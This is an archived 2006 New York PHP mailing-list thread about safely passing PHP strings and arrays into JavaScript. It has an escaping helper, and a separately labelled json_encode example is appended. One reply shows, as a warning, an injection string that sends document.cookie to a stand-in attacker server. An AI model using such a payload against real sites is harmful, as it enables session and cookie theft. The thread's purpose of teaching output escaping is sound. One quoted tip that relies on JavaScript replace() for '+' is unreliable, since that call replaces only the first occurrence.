[nycphp-talk] Passing JavaScript arrays

Cliff Hirsch cliff at pinestream.com
Mon Jul 10 08:19:13 EDT 2006


Interesting approach. How big was the array? It seems like this method
might produce unreasonably long URLs if there is extensive data.

-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Peter Sawczynec
Sent: Saturday, July 08, 2006 8:25 AM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Another possible basic technique for the PHP to JavaScript string data
transfer. 

Once upon creating a JavaScripted slideshow that rewrote the innerHTML
in div tags to change images and their complex multi-line descriptions,
I found this ditty worked for dynamically creating the JavaScript array
of image/text/HTML data.

1) In PHP do: urlencode($str_with_HTML_and_special_chars)

2) In the JavaScript do:
replace(unescape($str_with_HTML_and_special_chars),'+',' ')

Has not choked on anything.


Warmest regards,
 
Peter Sawczynec,
Technology Director
PSWebcode
_Design & Interface
_Ecommerce
_Database Management
ps at pswebcode.com
718.796.1951
www.pswebcode.com



-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Cliff Hirsch
Sent: Friday, July 07, 2006 1:47 PM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Thanks to all for the great responses -- very helpful. I've summarized
below:

> For security, do I just escape the output like any other variable
> destined for the browser?

It depends where it's coming from and what you're using it for. For
example, I have dynamic JS arrays coming from the DB that may contain
HTML, and will eventually populate drop-down menus.  For these, I pass
through a 'js cleansing' routine to trim, remove HTML tags, convert to
UTF-8 (or whatever), remove any line-breaks and escape all quotes. But
I'd be extremely wary if your JS data is coming from GET or POST.  I can
see a variable like the following jacking a JS array:

');
location='http://myevilserver.com/steal?your_cookies='+document.cookie;
//

If you're echoing a string from php into a javascript string var, you
need to escape it. Here's an example. The escapeString function here is
slightly modified from the one used in CakePHP's javascript helper:

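<?php
function escapeString($string) {
   // str_replace() applies the pairs in order, so the backslash is doubled
   // first, before the other escapes add backslashes of their own.
   $escape = array(
      '\\' => '\\\\',
      "\r\n" => '\n', "\r" => '\n', "\n" => '\n',
      '"' => '\"', "'" => "\\'",
      '</' => '<\/', // so "</script>" in the data cannot end the script block
   );
   return str_replace(array_keys($escape), array_values($escape), $string);
}

$string = "It's good to \"escape\" strings";
?>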

<script language="javascript" type="text/javascript">
// <![CDATA[
   var string = '<?php echo escapeString($string); ?>';
   alert(string);
// ]]>
</script>

If you don't want the JS to be inline, you can create a separate PHP
file that only outputs JavaScript code:

<script type="text/javascript" src="js.php"></script>

Just make sure js.php has the following before you start outputting
JavaScript:

header('content-type:text/javascript');

(From what I understand, Apache will by default cache .js files but
force a request for .php templates.  This may affect the chi of your
app..  man..)

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php
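
Added example, not part of the original thread or of CakePHP: for the question discussed above (passing a PHP array into JavaScript when the values may hold quotes, line breaks or HTML), one option is json_encode() with the JSON_HEX_* flags instead of hand-written string escaping. The helper name jsLiteral and the sample rows are constructed for illustration.

```php
<?php
// Added example: emit a PHP array as a JavaScript literal.
// The JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes, and
// json_encode() escapes backslashes, line breaks and "/" by default, so
// the output cannot close the string or the inline <script> block.
function jsLiteral($value) {
    $json = json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    if ($json === false) {
        // For example invalid UTF-8: fail closed rather than emit broken script.
        throw new RuntimeException('json_encode failed: ' . json_last_error_msg());
    }
    return $json;
}

// Constructed sample rows, standing in for database or request data.
$slides = array(
    array('img' => 'a.jpg', 'caption' => "It's good to \"escape\" strings"),
    array('img' => 'b.jpg', 'caption' => "line one\r\nline two"),
    array('img' => 'c.jpg', 'caption' => 'ends with a backslash \\'),
    array('img' => 'd.jpg', 'caption' => '</script><b>markup</b> & more'),
);
?>
<script type="text/javascript">
   var slides = <?php echo jsLiteral($slides); ?>;
   // Each caption arrives as the original text. Assign it with textContent
   // rather than innerHTML unless the markup is meant to be rendered.
</script>
```

The same call works for a single string, which json_encode() returns already wrapped in double quotes, so no surrounding quotes are written in the template.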
